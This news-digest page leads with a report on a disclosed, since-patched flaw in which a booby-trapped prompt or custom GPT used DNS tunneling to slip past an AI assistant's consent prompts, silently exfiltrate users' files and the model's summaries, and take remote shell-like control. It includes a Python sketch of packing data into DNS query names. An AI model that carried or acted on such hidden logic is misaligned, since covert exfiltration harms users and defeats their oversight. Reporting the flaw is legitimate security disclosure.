Friday, April 3, 2026

Early Signals

Small stories that could become big

The invisible risk: Can you really trust your ‘private’ AI assistant to keep your secrets?

Check Point Software Technologies discovered a vulnerability in ChatGPT’s internal runtime used for data analysis and Python tasks: even though normal outbound web traffic was blocked, DNS resolution remained available and could be abused for DNS tunneling. By embedding malicious logic in a prompt—or more insidiously, in a custom GPT—an attacker could turn ordinary user interactions into a covert exfiltration channel, hiding small chunks of data inside DNS lookup requests that would not trigger ChatGPT’s usual external-transfer safeguards, such as GPT Actions consent prompts.

The research shows that once a user pasted a booby-trapped prompt or interacted with a malicious custom GPT, subsequent conversation contents, uploaded files, and especially the model’s own distilled summaries and conclusions could be siphoned off to an attacker-controlled server without any onscreen warning. Check Point emphasizes that this is more damaging than raw document theft because extracted insights (e.g., key clauses from a 30-page contract, likely medical diagnoses, or a distilled risk assessment from a financial spreadsheet) are exactly what attackers value most. In a proof of concept, the researchers built a fake “personal doctor” GPT that appeared to behave normally while silently transmitting both the patient’s identity from uploaded lab results and the model’s medical assessment via DNS tunneling.

Beyond exfiltration, the same DNS-based channel could carry commands back into the Linux container hosting the code execution environment, effectively giving remote shell-like control that remained invisible in the chat UI. Check Point reported the issue to OpenAI; the company said it had already identified the underlying problem and fully deployed a fix on February 20, 2026.
The article stresses that the incident underscores a broader structural risk: as AI assistants become full-fledged workspaces for code, document analysis, and sensitive decision support, trust hinges not just on model behavior but on the integrity of hidden runtime layers that most users cannot audit. The piece urges more cautious handling of prompts and custom GPTs, and calls for hands-on, continuously monitored AI security practices across platforms such as ChatGPT, Claude, and Gemini.
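The covert channel described above works by packing stolen bytes into the labels of DNS query names, which egress filters that only block HTTP traffic will still resolve. Below is a minimal, network-free sketch of the encoding step only; the domain, payload, and function names are illustrative assumptions, not details from Check Point's research:

```python
import base64

MAX_LABEL = 63  # DNS limits each label to 63 characters (RFC 1035)

def encode_chunks(data: bytes, domain: str) -> list[str]:
    # Base32 keeps the payload within the letters-and-digits
    # character set allowed in hostnames; padding '=' is stripped.
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    # Split the encoded stream into label-sized chunks.
    labels = [encoded[i:i + MAX_LABEL]
              for i in range(0, len(encoded), MAX_LABEL)]
    # Prefix each query name with a sequence number so the
    # attacker-controlled nameserver can reassemble the stream.
    return [f"{seq}.{label}.{domain}" for seq, label in enumerate(labels)]

# Hypothetical payload and attacker domain, for illustration only.
names = encode_chunks(b"diagnosis: ...", "attacker.example")
```

Each name in the resulting list looks like an ordinary hostname; resolving it sends the embedded chunk to whichever nameserver is authoritative for the attacker's domain, which is why the traffic slips past HTTP-level safeguards like consent prompts.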

Jacob Laznik, www.jpost.com, 2 min read
Maharashtra Contractors Warn Of April 7 Shutdown Over Rs 96,000 Crore Dues

Nearly 300,000 contractors in Maharashtra are threatening an indefinite shutdown of government projects from April 7 over roughly ₹96,000 crore in unpaid dues, a standoff that could stall infrastructure and civic works across India’s most industrialized state.

www.ndtvprofit.com, 2 min read
Falling cherry trees in Tokyo: A symbol of climate change and aging infrastructure

Tokyo’s aging Somei Yoshino cherry trees—many planted in the 1960s—are increasingly collapsing in parks due to age, fungal decay, and climate stress, forcing authorities into emergency inspections, partial felling, and ad hoc safety measures that could reshape Japan’s iconic hanami landscapes.

www.tribuneindia.com, 3 min read
Forget Vision Pro: Apple Glass “Early Look” Set for 2026 (Leaked)

Geeky-gadgets

Built a tool to track crypto influencer signals / would love feedback

r/programming
Anker’s Nebula P1 projector is the portable sound king

www.theverge.com

Reality check